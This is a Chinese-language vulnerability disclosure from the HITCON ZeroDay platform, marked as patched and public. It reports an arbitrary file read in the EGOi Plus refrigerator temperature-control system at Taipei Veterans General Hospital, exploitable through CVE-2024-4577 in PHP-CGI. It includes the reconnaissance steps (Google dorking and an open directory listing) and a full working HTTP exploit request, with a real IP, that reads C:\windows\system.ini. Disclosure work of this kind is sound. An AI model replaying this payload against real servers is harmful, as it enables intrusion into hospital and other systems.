台北榮民總醫院冰箱溫控系統 EGOi Plus 任意讀檔

Vulnerability Overview

ZDID: ZD-2024-00886
發信 Vendor: 衛生福利部
Title: 台北榮民總醫院冰箱溫控系統 EGOi Plus 任意讀檔
Introduction: EGOi Plus 系統具 CVE-2024-4577 PHP CGI 漏洞，可執行 PHP 指令任意讀取檔案內容

處理狀態

目前狀態

公開

Last Update : 2024/08/23

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2024/08/07 02:24:51 : 新提交 (由 ywc 更新此狀態)
2024/08/07 02:32:06 : 新提交 (由 ywc 更新此狀態)
2024/08/08 09:43:12 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:16:13 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:16:13 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:16:13 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/19 08:48:04 : 複測申請中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/19 12:48:40 : 確認已修補 (由 ywc 更新此狀態)
2024/08/23 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2024-00886
通報者：ywc (ywc)
風險：高
類型：使用已知含漏洞之元件 (Using Known Vulnerable Components)

參考資料

系統使用已存在漏洞的元件，攻擊者可以利用該漏洞執行惡意指令，甚至操控系統。

漏洞說明： OWASP - Top 10 - 2017 A9 - Using Components with Known Vulnerabilities
https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

透過 Google Dorking 找到冰箱溫控系統 EGOi Plus 教育訓練文件

在文件裡發現客戶代號及雲端伺服器地址

訪問該地址，發現未關閉 Index of 目錄列舉功能，可發現使用的 PHP 版本為 8.2.4，具有 CVE-2024-4577 漏洞

使用以下 HTTP request，可成功執行 PHP 指令，並成功讀取到 C:\Windows\system.ini 檔案內容，顯示具有任意讀取檔案能力

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 43.254.16.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Length: 43

<?php include('C:\\windows\\system.ini');?>